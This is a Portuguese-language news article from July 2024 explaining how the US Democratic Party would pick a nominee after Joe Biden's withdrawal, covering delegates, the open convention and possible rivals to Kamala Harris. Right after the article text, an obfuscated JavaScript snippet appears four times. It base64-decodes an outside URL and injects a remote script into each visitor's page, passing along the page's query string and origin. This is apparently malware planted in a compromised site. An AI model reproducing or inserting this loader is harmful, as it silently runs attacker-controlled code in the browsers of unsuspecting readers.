Logomarca
Últimas Notícias

Eleições nos EUA: saiba como será a escolha do candidato democrata

Com a desistência de Joe Biden à reeleição neste domingo (21), a disputa pela candidatura democrata está em aberto a cerca de 100 dias das eleições.

Wagner Silva 22 de julho de 2024 Mundo Sem comentários

Com a desistência de Joe Biden da candidatura à reeleição e o apoio à vice-presidente Kamala Harris, os democratas enfrentam uma mudança sem precedentes a cerca de 100 dias da votação em 5 de novembro. A Convenção Nacional Democrata em Chicago, de 19 a 22 de agosto, que deveria coroar Biden, agora será uma disputa aberta entre quase 4.700 delegados para escolher um novo candidato contra Donald Trump.

BIDEN PODE REDIRECIONAR DEUS DELEGADOS?

Biden foi o único candidato nas prévias do partido e venceu em todos os estados, exceto na Samoa Americana, obtendo o apoio de 3.896 delegados. Embora as regras do partido não permitam que ele transfira esses delegados para outro candidato, seu apoio a Kamala Harris provavelmente terá influência política.

O QUE PODE ACONTECER NA CONVENÇÃO?

Com a saída de Biden, os democratas iniciam uma convenção aberta. No entanto, seu apoio a Kamala Harris leva o partido a um território incerto. Kamala precisa solidificar o apoio de quase 4.000 delegados dos estados, territórios e do distrito de Columbia, além de mais de 700 superdelegados, incluindo líderes do partido e ex-presidentes.

ALGUÉM DESAFIARÁ HARRIS?

Antes do anúncio de Biden, os democratas já mencionavam Gavin Newsom e Gretchen Whitmer como possíveis candidatos, além de Harris. No entanto, muitos argumentaram que Kamala seria a escolha óbvia por ser a primeira mulher negra e com descendência sul-asiática em um cargo nacional.

(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();


Fonte: Tv Meio



Comentários

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.